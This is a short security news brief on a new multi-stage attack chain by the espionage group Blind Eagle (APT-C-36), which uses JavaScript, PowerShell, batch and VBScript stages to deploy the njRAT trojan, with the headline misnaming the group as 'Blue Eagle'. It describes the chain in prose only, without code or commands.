New Blue Eagle attack chain examined

Cyberespionage operation Blind Eagle, also known as APT-C-36, has been using a new multi-stage attack chain to facilitate njRAT remote access trojan deployment, The Hacker News reports. Such an attack chain involves a JavaScript downloader leveraged for Discord CDN-hosted PowerShell script execution, with the script triggering the deployment of another PowerShell script and a Windows batch file while saving a VBScript file within the Windows startup folder for persistence, according to a ThreatMon report. Execution of the VBScript code then facilitates the deployment of the batch file, which is then deobfuscated for running a PowerShell script leveraged for njRAT distribution. "njRAT, also known as Bladabindi is a remote access tool (RAT) with user interface or trojan which allows the holder of the program to control the end-user's computer," said ThreatMon. Blind Eagle was earlier reported by CheckPoint and BlackBerry to have used spear-phishing techniques for BitRAT and AsyncRAT malware delivery.